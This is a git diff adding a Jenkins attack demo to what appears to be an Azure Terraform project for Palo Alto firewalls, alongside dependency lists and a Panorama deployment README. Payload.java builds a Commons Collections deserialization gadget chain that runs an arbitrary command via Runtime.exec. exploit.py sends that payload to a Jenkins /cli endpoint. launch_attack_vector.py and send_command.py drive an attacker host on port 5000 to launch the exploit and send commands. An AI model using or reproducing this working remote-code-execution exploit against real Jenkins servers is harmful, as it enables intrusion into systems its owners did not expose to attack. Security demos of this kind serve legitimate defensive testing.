a/azure/Jenkins_proj-working/jenkins/jenkins.sh b/azure/Jenkins_proj-working/jenkins/jenkins.sh new file mode 100644 index 00000000..b44f6ba2 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/jenkins.sh @@ -0,0 +1,24 @@ +#! /bin/bash -e + +: "${JENKINS_HOME:="/var/jenkins_home"}" +touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. 
Wrong volume permissions?"; exit 1; } +echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG" + +# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + # read JAVA_OPTS and JENKINS_OPTS into arrays + java_opts_array=() + while IFS= read -r -d '' item; do + java_opts_array+=( "$item" ) + done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS") + + jenkins_opts_array=( ) + while IFS= read -r -d '' item; do + jenkins_opts_array+=( "$item" ) + done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS") + + exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@" +fi + +exec "$@" diff --git a/azure/Jenkins_proj-working/jenkins/tini b/azure/Jenkins_proj-working/jenkins/tini new file mode 100644 index 00000000..4e5b36a9 Binary files /dev/null and b/azure/Jenkins_proj-working/jenkins/tini differ diff --git a/azure/Jenkins_proj-working/launch_attack_vector.py b/azure/Jenkins_proj-working/launch_attack_vector.py new file mode 100644 index 00000000..dce17b39 --- /dev/null +++ b/azure/Jenkins_proj-working/launch_attack_vector.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(attack_vector: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + print(outputs) + if attack_vector == 'native': + print('Using native waf protected attack vector...\n') + target = outputs['NATIVE-DNS']['value'] + elif attack_vector == 'panos': + print('Using PAN-OS protected attack vector...\n') + target = outputs['ALB-DNS']['value'] + else: + print('malformed outputs!') + target = '127.0.0.1' + if 'ATTACKER_IP' not in outputs: + print('No attacker ip found in tf outputs!') + sys.exit(1) + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['attacker'] = attacker + payload['target'] = target + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Exploit Successfully Launched!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Launch Exploit!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC') + parser.add_argument('-c', '--vector', help='Attack Vector', required=True) + + args = parser.parse_args() + vector = args.vector + + main(vector) + diff --git a/azure/Jenkins_proj-working/payload/Payload.java b/azure/Jenkins_proj-working/payload/Payload.java new file mode 100644 index 00000000..cbd4c8b5 --- /dev/null +++ b/azure/Jenkins_proj-working/payload/Payload.java @@ -0,0 +1,189 @@ +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamException; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import 
java.security.PrivateKey; +import java.security.PublicKey; +import java.security.Signature; +import java.security.SignedObject; +import java.util.Comparator; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import java.util.concurrent.ConcurrentSkipListSet; +import java.util.concurrent.CopyOnWriteArraySet; + +import net.sf.json.JSONArray; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.collection.AbstractCollectionDecorator; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import org.apache.commons.collections.map.ReferenceMap; +import org.apache.commons.collections.set.ListOrderedSet; + +public class Payload implements Serializable { + + private Serializable payload; + + public Payload(String cmd) throws Exception { + + this.payload = this.setup(cmd); + + } + + public Serializable setup(String cmd) throws Exception { + final String[] execArgs = new String[] { cmd }; + + final Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + execArgs), new ConstantTransformer(1) }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + final Map innerMap = new HashMap(); + + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException e) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + + Field f2 = null; + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException e) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array2 = (Object[]) f2.get(innimpl); + + Object node = array2[0]; + if (node == null) { + node = array2[1]; + } + + Field keyField = null; + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception e) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField( + "key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + PublicKey publicKey = keyPair.getPublic(); + + Signature signature = Signature.getInstance(privateKey.getAlgorithm()); + SignedObject payload = new SignedObject(map, privateKey, signature); + JSONArray array = new JSONArray(); + + array.add("asdf"); + + ListOrderedSet set = new ListOrderedSet(); + Field f1 = AbstractCollectionDecorator.class + .getDeclaredField("collection"); + f1.setAccessible(true); + f1.set(set, array); + + DummyComperator comp = new DummyComperator(); + ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); + 
csls.add(payload); + + CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); + CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); + + a1.add(set); + Container c = new Container(csls); + a1.add(c); + + a2.add(csls); + a2.add(set); + + ReferenceMap flat3map = new ReferenceMap(); + flat3map.put(new Container(a1), "asdf"); + flat3map.put(new Container(a2), "asdf"); + + return flat3map; + } + + private Object writeReplace() throws ObjectStreamException { + return this.payload; + } + + static class Container implements Serializable { + + private Object o; + + public Container(Object o) { + this.o = o; + } + + private Object writeReplace() throws ObjectStreamException { + return o; + } + + } + + static class DummyComperator implements Comparator, Serializable { + + public int compare(Object arg0, Object arg1) { + // TODO Auto-generated method stub + return 0; + } + + private Object writeReplace() throws ObjectStreamException { + return null; + } + + } + + public static void main(String args[]) throws Exception{ + + if(args.length != 2){ + System.out.println("java -jar payload.jar outfile cmd"); + System.exit(0); + } + + String cmd = args[1]; + FileOutputStream out = new FileOutputStream(args[0]); + + Payload pwn = new Payload(cmd); + ObjectOutputStream oos = new ObjectOutputStream(out); + oos.writeObject(pwn); + oos.flush(); + out.flush(); + + + } + +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar new file mode 100644 index 00000000..218510bc Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar new file mode 100644 index 00000000..c35fa1fe Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar new file mode 100644 index 00000000..98467d3a Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar new file mode 100644 index 00000000..93a3b9f6 Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar differ diff --git a/azure/Jenkins_proj-working/payload/exploit.py b/azure/Jenkins_proj-working/payload/exploit.py new file mode 100644 index 00000000..89c789d4 --- /dev/null +++ b/azure/Jenkins_proj-working/payload/exploit.py @@ -0,0 +1,92 @@ +import urllib +import requests +import uuid +import threading +import time +import gzip +import urllib3 +import zlib +import subprocess + +proxies = { +# 'http': 'http://127.0.0.1:8085', +# 'https': 'http://127.0.0.1:8090', +} + +TARGET = input("Enter Jenkins Target IP Address: ") +URL='http://' + TARGET + ':80/cli' + +PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' +PROTO = b'\x00\x00\x00\x00' + + +FILE_SER = open("payload.ser", "rb").read() + +def download(url, session): + + headers = {'Side' : 'download'} + #headers['Content-type'] = 'application/x-www-form-urlencoded' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 
Safari/537.36' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Session'] = session + headers['Transfer-Encoding'] = 'chunked' + r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) + print(r.content) + + +def upload(url, session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding'] = None + r = requests.post(url,data=data,headers=headers,proxies=proxies) + + +def upload_chunked(url,session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding']= None + headers['Transfer-Encoding'] = 'chunked' + headers['Cache-Control'] = 'no-cache' + + r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies) + + +def null_payload(): + yield b" " + +def create_payload(): + payload = PREAMBLE + PROTO + FILE_SER + + return payload + +def create_payload_chunked(): + yield PREAMBLE + yield PROTO + yield FILE_SER + +def main(): + print("start") + + session = str(uuid.uuid4()) + + t = threading.Thread(target=download, args=(URL, session)) + t.start() + + time.sleep(1) + print("pwn") + #upload(URL, session, create_payload()) + + upload_chunked(URL, session, "asdf") + +if __name__ == "__main__": + main() diff --git a/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar new file mode 100644 index 00000000..30fad12d Binary files /dev/null and b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar differ diff --git a/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar new file mode 100644 index 00000000..a47f128a Binary files /dev/null and b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar differ diff --git a/azure/Jenkins_proj-working/payload/payload.jar b/azure/Jenkins_proj-working/payload/payload.jar new file mode 100644 index 00000000..51e0bcc9 Binary files /dev/null and b/azure/Jenkins_proj-working/payload/payload.jar differ diff --git a/azure/Jenkins_proj-working/requirements.txt b/azure/Jenkins_proj-working/requirements.txt new file mode 100644 index 00000000..c36b3a97 --- /dev/null +++ b/azure/Jenkins_proj-working/requirements.txt @@ -0,0 +1,227 @@ +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.7 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 
+azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 +azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 +azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 +azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage==0.36.0 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-file==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +collections2==0.3.0 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2.4 +django-widget-tweaks==1.4.3 +docker==3.7.2 
+docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +pandevice==0.6.6 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.2.1 +prompt-toolkit==1.0.15 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +python-terraform==0.10.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +Twisted==18.9.0 +txaio==18.8.1 +urllib3==1.24.2 +vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/requirementsold2.txt b/azure/Jenkins_proj-working/requirementsold2.txt new file mode 100644 index 00000000..68742357 --- /dev/null +++ b/azure/Jenkins_proj-working/requirementsold2.txt @@ -0,0 +1,222 @@ +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.8 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 +azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 +azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 
+azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 +azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2 +django-widget-tweaks==1.4.3 +docker==3.7.2 +docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.4.0 +prompt-toolkit==2.0.9 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +Twisted==18.9.0 +txaio==18.8.1 +urllib3==1.24.2 +vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/send_command.py b/azure/Jenkins_proj-working/send_command.py new file mode 100644 index 00000000..cbccbdfb --- /dev/null +++ b/azure/Jenkins_proj-working/send_command.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform 
+import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(cli: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['cli'] = cli + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Command Successfully Executed!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Execute Command!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Send Jenkins Attack Command') + parser.add_argument('-c', '--cli', help='Attack Command', required=True) + parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False) + + args = parser.parse_args() + cli = args.cli + mcli = args.manual_cli + + if mcli is not None and mcli != '': + main(mcli) + else: + main(cli) + diff --git a/azure/panorama_new_rg/README.md b/azure/panorama_new_rg/README.md new file mode 100644 index 00000000..79c46c20 --- /dev/null +++ b/azure/panorama_new_rg/README.md @@ -0,0 +1,107 @@ +# Azure Panorama + +Terraform creates an instance of Panorama in a new Resource Group. + +## Prerequistes +* Valid Azure Subscription +* Access to Azure Cloud Shell + +## Caveats +You will need to determine the available versions of Panorama using the Azure CLI. The following command will show the Panorama versions currently available + +bash-4.3# az vm image list -p paloaltonetworks -f panorama --all +``` +[ + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:8.1.0", + "version": "8.1.0" + }, + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:8.1.2", + "version": "8.1.2" + }, + { + "offer": "panorama", + "publisher": "paloaltonetworks", + "sku": "byol", + "urn": "paloaltonetworks:panorama:byol:9.1.1", + "version": "9.1.1" + } +] +``` +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following command (**BASH ONLY!**): +``` +# Accept VM-Series EULA for desired currently-available version of Panorama 